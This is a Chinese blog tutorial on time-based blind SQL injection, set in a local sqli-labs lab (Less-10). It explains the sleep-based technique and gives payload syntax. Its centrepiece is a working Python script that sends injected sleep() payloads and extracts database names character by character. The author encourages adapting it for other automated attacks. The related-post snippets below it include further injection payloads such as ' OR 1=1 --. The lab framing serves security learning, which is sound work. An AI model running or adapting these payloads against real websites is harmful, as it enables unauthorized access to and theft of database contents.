3.2 SQL盲注-时间注入--sql注入python脚本自动打印数据库信息

最新推荐文章于 2023-12-13 14:08:10 发布
最新推荐文章于 2023-12-13 14:08:10 发布
阅读量1.2k 收藏 7
点赞数 2
文章标签: python sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy_extreme/article/details/105525776
版权

简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。

描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。

前面的话:操作学习的环境----Linux环境+docker+sqli-labs。环境配置请看:第一章:SQL注入基础--1.1Web应用架构分析&1.2 SQLi注入环境搭建或私信我亲测有效的资源给你。

Tips:这些都是作者学习过的内容,文字、思维导图等都是一双手,后续会连载这系列以及丰富流程说明,欢迎沟通交流、留言,觉得必要的也可收藏关注

1、概要:

3.2 SQL盲注-时间注入
    时间盲注原理
    时间盲注方法
    构造python脚本自动打印数据库信息(结尾附上源码)

2、详细的思维导图:

 

3.2 SQL盲注-时间注入
    时间盲注原理
        代码存在SQL注入漏洞然而页面即不会回显数据,也不会回显错误信息语句执行后也不提示真假,我们不能通过页面的内容来进行判断
这里我们可以通过构造语句,通过页面响应的时长,来判断信息,这既是时间盲注!
    时间盲注方法(可利用sqli-labs:Less-10演练,环境部属请看:第一章:SQL注入基础--1.1Web应用架构分析&1.2 SQLi注入环境搭建
        构造逻辑语句,通过条件语句进行判断,为真则立即执行,否则延时执行
        核心语法:if(left(user(),1)='a',0,sleep(5));
        真实场景:if(ascii(substr(database(),1,1))>115,0,sleep(5))

    构造python脚本自动打印数据库信息(掌握前面我连载的SQL注入博客的小伙伴,相信利用这个代码可举一反三,逍遥快活很多自动attack手段了)

#!/usr/bin/env python
#-*- coding:utf-8 -*-

import requests
import time

url = 'http://192.168.100.57/Less-10/?id=1'

database = 'select schema_name from information_schema.schemata'

tables = 'select table_name from information_schema.tables where table_schema=database()'

column = 'select column_name from information_schema.columns where table_name="table_name"'

result = ''
for i in range(1,30):
	for j in range(48,122):
		payload = '"and if(ascii(substr(({} limit 0,1),{},1))={},sleep(2),1)--+'.format(database,i,j)
		stime =time.time()
		r = requests.get(url+payload)
		etime = time.time()
		if etime-stime >=2:
			result += chr(j)
			print (result)
			break

 

buy11.11
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL住入原始脚本_SQL注入python脚本_
10-03
用于SQL注入,打开SQLmap运行脚本。布尔盲注注入
python使用datetime并格式插入MySQL
热门推荐
有人_295的博客
11-07 1万+
一、MySQL中记录时间的类型 二、python处理日期和时间(全部代码在最后) 使用的是 datetime 库处理时间 python时间日期格式化符号: %y 两位数的年份表示(00-99) %Y 四位数的年份表示(000-9999) %m 月份(01-12) %d 月内中的一天(0-31) %H 24小制小数(0-23) %I 12小制小数(01-12) %M 分钟数(00=59...
解决SQLAlchemy(Python)调用MySQL数据库插入时间戳数据的问题
xiecheng1995的博客
06-05 7421
在建表的类中定义时间戳类型的column,应写成: d_time = db.Column(db.DateTime, nullable=False) 向MySQL数据库中插入数据,插入数据的类型和格式(以当前系统时间为例)应写成如下形式: d_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) 此处需要import time 这...
Python pymssql 向MSSQL数据库写入日期时间
唔咿呀嘿嘿的博客
04-08 3340
def insert_datetime(self): d = datetime.today() # d是日期时间对象,带微秒部分 print(d) # 2022-04-08 09:10:46.181748 print('d type:', type(d)) # d type: <class 'datetime.datetime'> ...
oracle 日期输入,带有日期用户输入Python中的Oracle SQL查询
weixin_39830588的博客
04-07 90
from__future__importprint_functionimportpandasaspdimportnumpyasnpfromxlsxwriter.utilityimportxl_rowcol_to_cellimportconfigimportpandas.io.formats.excelpandas.io.formats.excel.header_style=NoneclassSum...
Python实现数据库导出Excel并动态化sql时间
qq_43001132的博客
12-13 555
Python实现数据库导出Excel并动态化sql时间
python连接mysql传递日期参数执行sql
weixin_43785299的博客
09-28 1275
通过python连接mysql,通过sql查询数据,再通过pandas对数据进一步处理,最后输出excel文件。
利用pythonSQL Server执行日期操作
python_caiji的博客
05-01 2044
数据库all_data下的表car_table有列Time_Normal,数据格式为2017-09-08 23:58:51.0000000 ,想要实现的操作是:五分钟一个阶段,一天分为288个阶段,   把对应的段填写到列period中。              ...
时间盲注脚本(附带注释)
sGanYu
03-22 2747
参考python安全攻防时间盲注,自己修改了一些内容,加入了异常处理防止乱跑 # -*- coding: UTF-8 -*- import requests import time DBName = "" # 数据库名的变量 DBTables = [] DBColumns = [] DBData = {} requests.adapters.DEFAULT_RETRIES = 10 conn = requests.session() conn.keep_alive = False # 设置重连
python脚本实现sql时间盲注
wrypot的博客
03-27 675
python脚本实现sql盲注 sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
tibiawiki-sql:从TibiaWiki文章生成SQLite数据库Python脚本
02-23
tibiawiki-sql 为MMO Tibia生成sqlite数据库脚本。 受 TibiaWiki解析脚本的启发。 与依靠不经常更新的相比,该脚本通过其API从TibiaWiki获取数据。 通过使用API​​,所获得的数据始终是最新的。 该脚本并非...
基于Python自动SQL注入工具开发
04-29
随着全球信息化大局的全面铺开,全世界生产力和社会经济的发展都越来越离 不开互联网,大到国家,小到组织和个人,都已经习惯了享受互联网为我们带来的 便利。然而,纷繁复杂的互联网应用背后却暗藏着巨大的安全隐患...
MSSQL SQLServer分布式集群Python自动故障转移脚本
06-15
【MSSQLSQLServer分布式集群Python自动故障转移脚本 #安装依赖 pip install pymssql #windows打包 pyinstaller -w -F mssqlScript.py ######or pyinstaller -F mssqlScript.py #windows运行 ./mssqlScript.exe ...
Python 数据库Insert语句脚本生成工具(SQL Server)
12-22
编写这个小工具,是因为平部署项目的候,需要导出一些公共的数据(权限、参数设置等),覆盖插入正式环境。 话不多说,直接上代码: import pyodbc import warnings import decimal import winreg ...
记一次sql盲注脚本编写(复现的sql注入
whojoe的博客
04-13 2873
记一次sql盲注脚本编写前言开始测试已经修改了网站的具体信息这里只是做一个演示使用burp测试使用sqlmap命令复现漏洞php文件数据表bool注入脚本结果结束 前言 同学发给我一个钓鱼网站,打开经过简单的测试发现没什么漏洞,但是还不想放手,所以就尝试了一下referer还有数据包中不存在的xff头 开始测试 已经修改了网站的具体信息这里只是做一个演示 POST /sql.php HTTP/1....
使用python编写sql时间盲注的exp
CC210231的博客
04-05 1929
前言: 前面学习了布尔盲注的exp,原理是根据页面的两个返回状态来确定注入的语句是否正确执行,从而得到我们想要的数据,但有候,页面只会返回一种状态,布尔盲注就无法实行了,此,我们就要用到另一种盲注方式:时间盲注,也叫延注入注入原理: 延注入是利用sql语句达到延的目的,在mysql中用的sleep()函数, select sleep(3) 数据库3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延注入注入得出数据。 我们在exp中怎样利用呢? 我们可以获
SQL盲注python脚本爆破及sqlmap基础操作
wangringyi的博客
04-09 6073
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、SQL盲注是什么? 二、介绍与使用 1.盲注的三种分类 2.基于报错的盲注 3.基于时间脚本盲注 sqlmap的使用 前言 哈,我是爱挖洞的萝卜头,从今天开始来csdn分享学习过过程,学习经历,望各位大佬指教指教,嘿嘿嘿。 一、SQL盲注是什么? 经历过前面的数字型注入,字符型注入,提交方式注入等,我们对sql注入有了基本的...
sql注入盲注python脚本
最新发布
04-06
下面是一个使用Python编写的简单SQL注入盲注脚本的示例: ```python import requests def check_vulnerable(url): payload = "' OR 1=1 --" response = requests.get(url + "?id=" + payload) if "Welcome" in ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值